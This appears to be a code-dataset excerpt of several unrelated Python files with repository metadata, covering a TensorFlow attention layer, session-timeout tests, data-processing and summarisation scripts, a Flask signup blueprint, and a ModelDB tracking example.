self._use_bias = use_bias
self._dropout = dropout
self._scale = math.sqrt(float(key_dim))
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
def build(self, input_shape: tf.TensorShape) -> None:
input_dim = input_shape[-1]
free_dims = input_shape.rank - 1
common_kwargs = dict(
kernel_initializer=self._kernel_initializer,
bias_initializer=self._bias_initializer)
einsum_equation, bias_axes, output_rank = _build_proj_equation(
free_dims, bound_dims=1, output_dims=2)
self.query_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[self._num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
if self._attn_type == "multi_head":
num_heads = self._num_heads
elif self._attn_type == "multi_query":
num_heads = 1
else:
raise ValueError(
"{} is not a recognized attention type".format(self._attn_type))
self.key_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self.value_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1,
[num_heads, self._key_dim]),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self._dot_product_equations = []
self._combine_equations = []
self.softmax_layers = []
for attn_axes in self._attn_axes:
attn_axes = tuple(attn_axes)
(dot_product_equation, combine_equation,
attn_scores_rank) = _build_attention_equation(output_rank, attn_axes)
norm_axes = tuple(
range(attn_scores_rank - len(attn_axes), attn_scores_rank))
self._dot_product_equations.append(dot_product_equation)
self._combine_equations.append(combine_equation)
self.softmax_layers.append(tf.keras.layers.Softmax(axis=norm_axes))
output_shape = [input_dim]
einsum_equation, bias_axes, output_rank = _build_proj_equation(
free_dims, bound_dims=2, output_dims=len(output_shape))
self.output_dense = tf.keras.layers.experimental.EinsumDense(
einsum_equation,
output_shape=_get_output_shape(output_rank - 1, output_shape),
bias_axes=bias_axes if self._use_bias else None,
**common_kwargs)
self.dropout_layer = tf.keras.layers.Dropout(self._dropout)
super().build(input_shape)
def call(self,
queries: tf.Tensor,
values: tf.Tensor,
training: Optional[bool] = None) -> tf.Tensor:
queries = self.query_dense(queries)
keys = self.key_dense(values)
values = self.value_dense(values)
if self._attn_type == "multi_query":
keys = tf.repeat(keys, [self._num_heads], axis=-2)
values = tf.repeat(values, [self._num_heads], axis=-2)
num_axes = len(self._attn_axes)
queries = tf.split(queries, num_or_size_splits=num_axes, axis=-2)
keys = tf.split(keys, num_or_size_splits=num_axes, axis=-2)
values = tf.split(values, num_or_size_splits=num_axes, axis=-2)
outputs = []
for i in range(num_axes):
attn_scores = tf.einsum(self._dot_product_equations[i], keys[i],
queries[i]) / self._scale
attn_scores = self.softmax_layers[i](attn_scores)
attn_scores = self.dropout_layer(attn_scores, training=training)
outputs.append(
tf.einsum(self._combine_equations[i], attn_scores, values[i]))
outputs = tf.concat(outputs, axis=-2)
outputs = self.output_dense(outputs)
return outputs
| 36.683824 | 80 | 0.668938 | 1,902 | 14,967 | 5.004732 | 0.150894 | 0.022797 | 0.038239 | 0.022691 | 0.473684 | 0.426726 | 0.405505 | 0.379872 | 0.342473 | 0.329867 | 0 | 0.004406 | 0.226565 | 14,967 | 407 | 81 | 36.773956 | 0.817899 | 0.245674 | 0 | 0.363636 | 0 | 0 | 0.023956 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064394 | false | 0 | 0.018939 | 0.007576 | 0.147727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb862f4a8029cde118b843ccf18aba340863ade | 1,783 | py | Python | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | tests/integration/session/test_timeout.py | uk-gov-mirror/ONSdigital.eq-questionnaire-runner | 4684bc560bfc7a169e279846fb341a188decb374 | [
"MIT"
] | null | null | null | import time
from app import settings
from tests.integration.integration_test_case import IntegrationTestCase
class TestTimeout(IntegrationTestCase):
def setUp(self):
settings.EQ_SESSION_TIMEOUT_SECONDS = 4
super().setUp()
def tearDown(self):
settings.EQ_SESSION_TIMEOUT_SECONDS = 45 * 60
super().tearDown()
def test_timeout_continue_valid_session_returns_200(self):
self.launchSurvey("test_timeout")
self.get(self.last_url)
self.assertStatusOK()
def test_when_session_times_out_server_side_401_is_returned(self):
self.launchSurvey("test_timeout")
time.sleep(5)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("Your session has timed out due to inactivity")
def test_alternate_401_page_is_displayed_when_no_cookie(self):
self.get("/session")
self.assertStatusUnauthorised()
self.assertInBody("Sorry there is a problem")
self.assertEqualPageTitle("Page is not available - Census 2021")
def test_schema_defined_timeout_cant_be_higher_than_server(self):
self.launchSurvey("test_timeout")
time.sleep(4)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("To help protect your information we have timed you out")
self.assertEqualPageTitle("Session timed out - Census 2021")
def test_submission_complete_timeout(self):
self.launchSurvey("test_timeout")
self.post()
self.post()
time.sleep(4)
self.get(self.last_url)
self.assertStatusUnauthorised()
self.assertInBody("This page is no longer available")
self.assertEqualPageTitle("Submission Complete - Census 2021")
| 34.960784 | 83 | 0.702748 | 209 | 1,783 | 5.755981 | 0.392345 | 0.029094 | 0.0665 | 0.079801 | 0.361596 | 0.361596 | 0.230258 | 0.171239 | 0.171239 | 0.119701 | 0 | 0.020655 | 0.212563 | 1,783 | 50 | 84 | 35.66 | 0.836182 | 0 | 0 | 0.390244 | 0 | 0 | 0.173303 | 0 | 0 | 0 | 0 | 0 | 0.292683 | 1 | 0.170732 | false | 0 | 0.073171 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bb9490db31d19350990f886cce9e445402e6686 | 3,571 | py | Python | nanoql/utils.py | viehwegerlib/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | 1 | 2019-04-24T21:38:26.000Z | 2019-04-24T21:38:26.000Z | nanoql/utils.py | phiweger/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | null | null | null | nanoql/utils.py | phiweger/nanoql | 152c511afcff96c869d8eff261eebd7e82bc4337 | [
"BSD-3-Clause"
] | null | null | null | def get_selection_fields(info):
'''Get all fields that are part of the (first-level) query.'''
# Is a certain field present?
# https://github.com/graphql-python/graphene/issues/462
# https://github.com/graphql-python/graphene/issues/431
sub_fields = []
for field in info.field_asts:
for selection in field.selection_set.selections:
sub_fields.append(selection.name.value)
return sub_fields
# https://gist.github.com/href/1319371
def convert_to_obj(dictionary, name='GenericDict'):
'''Convert a dict into a named tuple object.'''
from collections import namedtuple
NT = namedtuple(name, dictionary.keys())
gen_dict = NT(**dictionary)
return gen_dict
def url_base(key):
'''Return base urls.
Example:
url_base('search')
# 'http://www.ebi.ac.uk/ena/data/search'
'''
d = {'base': 'http://www.ebi.ac.uk/ena/data/',
'taxon': 'view/Taxon:',
'project': 'view/Project:',
'stats_taxon': 'stats/taxonomy/',
'retrieve': 'view/',
'search': 'search'}
return d['base'] + d[key]
def url_append(d, prefix=None):
'''
url = 'http://www.ebi.ac.uk/ena/data/view/'
params = {
'domain': 'assembly',
'result': 'assembly',
'display': 'xml'}
url += url_append(params, prefix='SOMEID')
'''
s = ''
for k, v in d.items():
s += '&{}={}'.format(k, v)
if prefix:
return str(prefix) + s # if prefix e.g. tax ID (int) cast to str
else:
return s
def sanitize_keys(d, fmt_function):
'''
stackoverflow, 11700705
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
fmt_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
Example:
\b
from dotmap import DotMap
result = xmltodict.parse(requests.get(url).text)
dm = DotMap(sanitize_keys(result, lambda key: camel_to_snake(key.replace('@', ''))))
dm.root.taxon.tax_id # '287'
dm.root.taxon.taxonomic_division # 'PRO'
dm.root.taxon.children.taxon[0].tax_id # Pseudomonas aeruginosa 2192
'''
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = sanitize_keys(v, fmt_function)
elif isinstance(v, list):
new_v = list()
for x in v:
try:
new_v.append(sanitize_keys(x, fmt_function))
except AttributeError: # list contains types other than dict
new_v.append(x)
new[fmt_function(k)] = new_v
return new
def camel_to_snake(name):
'''stackoverflow, 1175208'''
import re
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def xmltodotmap(xml):
'''Turn xml (ugly) into dotmap (pretty).'''
from dotmap import DotMap
import xmltodict
from nanozoo.utils import sanitize_keys, camel_to_snake
return DotMap(
sanitize_keys(
xmltodict.parse(xml),
lambda key: camel_to_snake(key.replace('@', ''))))
def chunks(l, n):
'''
Yield successive n-sized chunks from l (stackoverflow, 312443).
a = [1, 2, 3, 4]
list(chunks(a, 2))
# [[1, 2], [3, 4]]
Returns empty list if list empty.
For overlapping chunks, see windows()
'''
for i in range(0, len(l), n):
yield l[i:i + n] | 27.898438 | 110 | 0.590871 | 484 | 3,571 | 4.264463 | 0.386364 | 0.034884 | 0.023256 | 0.017442 | 0.117733 | 0.112888 | 0.100291 | 0 | 0 | 0 | 0 | 0.022857 | 0.264912 | 3,571 | 128 | 111 | 27.898438 | 0.763429 | 0.41305 | 0 | 0.035088 | 0 | 0 | 0.097587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140351 | false | 0 | 0.087719 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bbd87daa4cfa31b2dc33749abd08701b4188d90 | 1,742 | py | Python | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | imagenet/csv2txts.py | clearsky767/examples | d6c744061ba5ed56088af43edb171990c6942efd | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import time
import os
import argparse
parser = argparse.ArgumentParser(description='csv2txts')
parser.add_argument('--path', default='test2', type=str, metavar='PATH',help='csvs path')
args = parser.parse_args()
def ReadCsv(filename):
filedata = pd.read_csv(filename)
wavedata = [elem for elem in filedata.iloc[:,1]]
return wavedata
def WriteTxt(filename,data):
fo = open(filename, "w+")
sep = "\n"
fl = fo.write(sep.join(data))
fo.close()
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
return
def Filter(data, fs = 125):
#bandpass 0.6Hz~25Hz
b, a = signal.butter(2, [40.0/60.0/fs*2,1500.0/60.0/fs*2] ,'bandpass')
filteddata = signal.filtfilt(b, a, data)
#filteddata = signal.lfilter(b, a, data)
return filteddata
def main():
start_tm = time.time()
print("now start read csv files!")
tm = time.time()
filepath = args.path
csvlist = [os.path.join(os.path.realpath('.'), filepath, file) for file in os.listdir(filepath) if os.path.splitext(file)[1] == '.csv']
for csv in csvlist:
try:
data = ReadCsv(csv)
data = Filter(data)
filename = os.path.basename(csv)
filename = filename.split(".")[0]
filename = os.path.join(os.path.realpath(filepath), "txts/{}.txt".format(filename))
data = [str(s) for s in data]
WriteTxt(filename,data)
except:
print("except {}".format(csv))
continue
print("time is {}".format(time.time()-tm))
print("total time is {}".format(time.time()-start_tm))
if __name__ == '__main__':
main()
| 28.557377 | 139 | 0.624569 | 243 | 1,742 | 4.423868 | 0.415638 | 0.03907 | 0.037209 | 0.011163 | 0.109767 | 0.059535 | 0.059535 | 0 | 0 | 0 | 0 | 0.021402 | 0.222158 | 1,742 | 60 | 140 | 29.033333 | 0.771956 | 0.033295 | 0 | 0 | 0 | 0 | 0.076694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0.020408 | 0.142857 | 0 | 0.306122 | 0.081633 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bbfd9537f9395b239f5680df719f35749bdc407 | 3,700 | py | Python | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | 1 | 2019-10-03T20:15:21.000Z | 2019-10-03T20:15:21.000Z | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | null | null | null | lm/utils.py | CRAFIS/pycodesuggest | c21ab27e46d5c8078636f4b0b49c55e6eb9096ec | [
"MIT"
] | null | null | null | import os
import sys
import shutil
import copy
from glob import iglob
import pickle
import itertools
import datetime
import numpy as np
from model import *
def get_file_list(config, data_path, pattern, description):
files = [y for x in os.walk(data_path) for y in iglob(os.path.join(x[0], pattern))]
if len(files) == 0:
print("No partitions found for %s data, exiting..." % description)
sys.exit()
print("Found %d%s partitions for %s data"
% (len(files), " prebatched" if config.use_prebatched else "", description))
if config.num_partitions:
print("But only using %d due to num_partitions parameter" % config.num_partitions)
files = files[:config.num_partitions]
return files
def copy_temp_files(files, temp_dir):
temp_files = []
for file in files:
target_file = os.path.split(file)[1]
target_file = os.path.join(temp_dir, target_file)
shutil.copy2(file, target_file)
temp_files.append(target_file)
return temp_files
def create_model(config, is_training):
if config.attention and config.attention_variant == "input":
return AttentionModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "output":
return AttentionOverOutputModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "keyvalue":
return AttentionKeyValueModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "exlambda":
return AttentionWithoutLambdaModel(is_training=is_training, config=config)
elif config.attention and config.attention_variant == "baseline":
return AttentionBaselineModel(is_training=is_training, config=config)
else:
return BasicModel(is_training=is_training, config=config)
def attention_masks(attns, masks, length):
lst = []
masks = np.array(masks)
if "full" in attns:
lst.append(np.ones([1, length]))
if "identifiers" in attns:
lst.append(masks[:, 0:length] if len(masks.shape) == 2 else np.reshape(masks[0:length], [1, length]))
return np.transpose(np.concatenate(lst)) if lst else np.zeros([0, length])
class FlagWrapper:
def __init__(self, dictionary):
self.__dict__ = dictionary
def __getattr__(self, name):
return self.__dict__['__flags'][name]
def copy_flags(flags):
dict_copy = copy.copy(flags.__dict__)
return FlagWrapper(dict_copy)
def identity_map(x):
return x
def flatmap(func, *iterable):
return itertools.chain.from_iterable(map(func, *iterable))
# from
# http://stackoverflow.com/questions/33759623/tensorflow-how-to-restore-a-previously-saved-model-python
def save_model(saver, sess, path, model, config):
if not os.path.exists(path):
os.makedirs(path)
now = datetime.datetime.now().strftime("%Y-%m-%d--%H-%M--%f")
out_path = os.path.join(path, now + "/")
tf.train.write_graph(model.graph.as_graph_def(), out_path, 'model.pb', as_text=False)
if not os.path.exists(out_path):
os.makedirs(out_path)
with open(os.path.join(out_path, "config.pkl"), "wb") as f:
pickle.dump(config, f)
saver.save(sess, os.path.join(out_path, "model.tf"))
latest_path = os.path.join(path, "latest")
if os.path.islink(latest_path):
os.remove(latest_path)
os.symlink(now, latest_path)
return out_path
def load_model(sess, path):
load_variables(sess, os.path.join(path, "model.tf"), tf.trainable_variables())
def load_variables(session, path, variables):
saver = tf.train.Saver(variables)
saver.restore(session, path)
| 31.355932 | 109 | 0.697568 | 512 | 3,700 | 4.869141 | 0.294922 | 0.052146 | 0.028079 | 0.048135 | 0.205375 | 0.163658 | 0.121941 | 0.121941 | 0.121941 | 0.121941 | 0 | 0.005943 | 0.181351 | 3,700 | 117 | 110 | 31.623932 | 0.817101 | 0.029189 | 0 | 0 | 0 | 0 | 0.07107 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144578 | false | 0 | 0.120482 | 0.036145 | 0.445783 | 0.036145 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bc2a2578cb5ef6c6109f7a91d5e1dbf0a7adc75 | 1,920 | py | Python | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | null | null | null | client-portal/controller/khandani_sahara/khandani_sahara.py | oakbani/ksdp-portal | 8f44b3cb0081a7f31b9c8121883dd51945a05520 | [
"MIT"
] | 1 | 2021-09-19T10:58:17.000Z | 2021-09-19T10:58:17.000Z | from flask import Blueprint, request, render_template
from include.models import (
Donor as DonorModel,
Family as FamilyModel,
FinancialAid as FinancialAidModel,
)
from include.parsers import (
DonorRegistrationSchema,
FinancialAidRecipientRegistrationSchema,
)
from include.db import db_session
khandani_sahara_api = Blueprint(
"khandani_sahara", __name__, url_prefix="/khandani-sahara"
)
@khandani_sahara_api.route("/")
def index():
return render_template("khandani-sahara.html")
@khandani_sahara_api.route("/donor")
def donor():
return render_template("/donor-signup.html")
@khandani_sahara_api.route("/donor/signup", methods=["POST", "GET"])
def sign_up_donor():
if request.method == "POST":
payload = {"name": request.form["name"], "contact_num": request.form["phone"]}
args = DonorRegistrationSchema().load(payload)
donor = DonorModel(**args)
db_session.add(donor)
db_session.commit()
return render_template("/donor-signup.html")
@khandani_sahara_api.route("/recipient")
def recipient():
return render_template("/recipient-signup.html")
@khandani_sahara_api.route("/recipient/signup", methods=["POST", "GET"])
def sign_up_recipient():
if request.method == "POST":
family_obj = (
db_session.query(FamilyModel)
.filter(FamilyModel.email == request.form["email"])
.first()
)
custom_args = {
"family_id": family_obj.id,
"family_income": request.form["family_income"],
"expenses": request.form["expenses"],
}
args = FinancialAidRecipientRegistrationSchema().load(custom_args)
recipient = FinancialAidModel(**args)
db_session.add(recipient)
db_session.commit()
return render_template("/recipient-signup.html")
| 30.47619 | 87 | 0.652083 | 196 | 1,920 | 6.173469 | 0.30102 | 0.104132 | 0.084298 | 0.090909 | 0.294215 | 0.294215 | 0.183471 | 0.094215 | 0.094215 | 0.094215 | 0 | 0 | 0.221875 | 1,920 | 62 | 88 | 30.967742 | 0.809906 | 0 | 0 | 0.16 | 0 | 0 | 0.1507 | 0.023681 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.08 | 0.06 | 0.28 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e4cac8da9f490ff5b2493db9724ce2e35f1393 | 6,458 | py | Python | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | 1 | 2020-07-16T14:17:56.000Z | 2020-07-16T14:17:56.000Z | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | 2 | 2021-03-31T19:49:22.000Z | 2021-12-13T20:37:29.000Z | code_v2/main.py | gajanlee/SLN-Summarization | 4cc23deba855e70089636db76ab0add2e2a2ffc0 | [
"Apache-2.0"
] | null | null | null | import nltk
import re
from collections import Counter
import string
from itertools import chain
from lxml import etree
from pathlib import Path
from copy import deepcopy
from sln import extract_relations_from_sentence, summarize, slns_to_neo4j, SLN, summarization_slns_to_neo4j
from nltk.stem import WordNetLemmatizer
from word_scoring import smi
lemmatizer = WordNetLemmatizer()
symbols = r"!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘'‛“”„‟…‧﹏."
symbols += string.punctuation + "\\"
symbols += "".join([chr(i) for i in range(945, 970)])
digits = "1234567890"
def segment_sentence(text):
return nltk.sent_tokenize(text)
def paper_corpus(file_name="147.P14-1087.xhtml.txt"):
base_path = Path("/media/lee/辽东铁骑/数据集/acl2014/RST_summary/data/acl2014/")
abstract = (base_path / "abstract" / file_name).read_text()
introduction, *sections, conclusion = (base_path / "content" / file_name).read_text().split("\n")
return abstract, introduction, " ".join(sections), conclusion
def tokenize_sentences_and_words(text):
sentences = []
for sentence_ in nltk.sent_tokenize(text.lower().replace(".", ". ")):
# sentence = sentence.lower().replace(".", ". ")
sentence = re.sub(f"[{symbols+digits}]", " ", sentence_)
sentence = "".join([char for char in sentence if 0 < ord(char) < 128])
words = nltk.word_tokenize(sentence)
words = list(map(lemmatizer.lemmatize, words))
words = [word for word in words if len(word) > 1]
if len(words) <= 3:
continue
sentences.append(words)
return sentences
def run(file_name):
abstract, introduction, section, conclusion = paper_corpus(file_name)
abstract_sentences_tokens = tokenize_sentences_and_words(abstract)
introduction_sentences_tokens = tokenize_sentences_and_words(introduction)
section_sentences_tokens = tokenize_sentences_and_words(section)
conclusion_sentences_tokens = tokenize_sentences_and_words(conclusion)
score_dict = smi(
list(chain(*(introduction_sentences_tokens + conclusion_sentences_tokens))),
list(chain(*section_sentences_tokens)),
)
whole_slns, summary_slns, summary_sentences = summarize(
introduction_sentences_tokens + section_sentences_tokens + conclusion_sentences_tokens,
deepcopy(score_dict),
)
abstract_slns = []
for sentence_tokens in abstract_sentences_tokens:
s = SLN(sentence_tokens)
s.construct()
abstract_slns.append(s)
node_statements, relation_statements = summarization_slns_to_neo4j(whole_slns, summary_slns, abstract_slns)
Path("./neo4j.txt").write_text(
"\n".join([
"MATCH (n)-[r]-() DELETE n,r",
"\n".join(node_statements),
"\n".join(relation_statements),
])
)
node_statements, relation_statements = slns_to_neo4j(summary_slns, "Generated")
Path("./generated_summary_neo4j.txt").write_text(
"\n".join([
# "MATCH (n)-[r]-() DELETE n,r",
"\n".join(node_statements),
"\n".join(relation_statements),
])
)
# print(sorted(score_dict.items(), key=lambda x: x[1]))
# sentences = []
# for sentence in nltk.sent_tokenize(introduction + " ".join(sections) + conclusion):
# sentence = sentence.lower().replace(".", ". ")
# words = nltk.word_tokenize(sentence)
# words = list(map(lemmatizer.lemmatize, words))
# sentences.append(words)
# relations = extract_relations_from_sentence(sentences)
# print(len(relations))
analysed_words = ["topic", "approach", "result", "performance", "search", "engine", "graph", "pagerank", "state", "word", "label", "method", "topic", "keywords"]
analysed_phrases = [
["topic", "keywords"],
["search", "engine"],
]
analysis(abstract_sentences_tokens,
introduction_sentences_tokens,
section_sentences_tokens,
conclusion_sentences_tokens,
summary_sentences,
summary_slns,
analysed_words,
analysed_phrases,
score_dict)
def analysis(abstract_sentences_tokens,
introduction_sentences_tokens,
section_sentences_tokens,
conclusion_sentences_tokens,
summary_sentences,
summary_slns,
analysed_words,
analysed_phrases,
score_dict):
text_sentences_tokens = introduction_sentences_tokens + section_sentences_tokens + summary_sentences
print("Abstract token count:", len(list(chain(*abstract_sentences_tokens))))
print("Full text token count:", len(list(chain(*text_sentences_tokens))))
print("Generated summary token count:", len(list(chain(*summary_sentences))))
counter = Counter(chain(*text_sentences_tokens))
introduction_counter = Counter(chain(*introduction_sentences_tokens))
conclusion_counter = Counter(chain(*conclusion_sentences_tokens))
section_counter = Counter(chain(*section_sentences_tokens))
for word in analysed_words:
print(f"Analysing word {word}")
print(f"Score is {score_dict[word]}")
print("Occur in Introduction count: ", introduction_counter.get(word, 0))
print("Occur in Middle count: ", section_counter.get(word, 0))
print("Occur in Conclusion count: ", conclusion_counter.get(word, 0))
print("====")
for phrase in analysed_phrases:
phrase = " ".join(phrase)
count = 0
for sentence in introduction_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Introduction.")
count = 0
for sentence in section_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Middle.")
count = 0
for sentence in conclusion_sentences_tokens:
if phrase in " ".join(sentence):
count += 1
print(f"phrase `{phrase}` occurs {count} times in Conclusion.")
if __name__ == "__main__":
run("100.P14-2103.xhtml.txt")
# run("4.P14-2007.xhtml.txt")
# for file_path in Path("/media/lee/辽东铁骑/数据集/acl2014/RST_summary/data/acl2014/abstract").glob("*"):
# name = file_path.name
# print(name)
# run(name) | 35.679558 | 165 | 0.649117 | 725 | 6,458 | 5.587586 | 0.215172 | 0.114786 | 0.05332 | 0.030857 | 0.405579 | 0.345841 | 0.306344 | 0.274253 | 0.258455 | 0.240188 | 0 | 0.01574 | 0.222824 | 6,458 | 181 | 166 | 35.679558 | 0.784618 | 0.102199 | 0 | 0.246032 | 0 | 0 | 0.137842 | 0.03459 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039683 | false | 0 | 0.087302 | 0.007937 | 0.150794 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7e5da80ce74b18690ef1d22753f70b220f9bdf6 | 1,979 | py | Python | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
] | 5 | 2018-07-17T08:32:53.000Z | 2020-12-11T01:26:06.000Z | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
] | 16 | 2019-04-14T17:53:46.000Z | 2022-03-02T09:58:52.000Z | modeldb/model_sync.py | jlewi/kubeflow-dev | 5e5093e182a277e8518b1a8abcccb05d20466d35 | [
"Apache-2.0"
] | 10 | 2018-03-06T23:13:21.000Z | 2020-06-26T06:50:10.000Z | """Experiment with using modeldb to track model information using its
API:
https://github.com/mitdbg/modeldb/blob/master/client/python/light_api.md
based on:
https://github.com/mitdbg/modeldb/blob/master/client/python/samples/basic/BasicWorkflow.py
"""
from modeldb.basic.Structs import (
Model, ModelConfig, ModelMetrics, Dataset)
from modeldb.basic.ModelDbSyncerBase import Syncer
if __name__ == "__main__":
# Create a syncer using a convenience API
# syncer_obj = Syncer.create_syncer("gensim test", "test_user", \
# "using modeldb light logging")
# Example: Create a syncer from a config file
syncer_obj = Syncer.create_syncer_from_config("syncer.json")
# Example: Create a syncer explicitly
# syncer_obj = Syncer(
# NewOrExistingProject("gensim test", "test_user",
# "using modeldb light logging"),
# DefaultExperiment(),
# NewExperimentRun("", "sha_A1B2C3D4"))
# Example: Create a syncer from an existing experiment run
# experiment_run_id = int(sys.argv[len(sys.argv) - 1])
# syncer_obj = Syncer.create_syncer_for_experiment_run(experiment_run_id)
print("I'm training some model")
datasets = {
"train" : Dataset("/path/to/train", {"num_cols" : 15, "dist" : "random"}),
"test" : Dataset("/path/to/test", {"num_cols" : 15, "dist" : "gaussian"})
}
# create the Model, ModelConfig, and ModelMetrics instances
model = "model_obj"
model_type = "NN"
mdb_model1 = Model(model_type, model, "/path/to/model1")
model_config1 = ModelConfig(model_type, {"l1" : 10})
model_metrics1 = ModelMetrics({"accuracy" : 0.8})
# sync the datasets to modeldb
syncer_obj.sync_datasets(datasets)
# sync the model with its model config and specify which dataset tag to use for it
syncer_obj.sync_model("train", model_config1, mdb_model1)
# sync the metrics to the model and also specify which dataset tag to use for it
syncer_obj.sync_metrics("test", mdb_model1, model_metrics1)
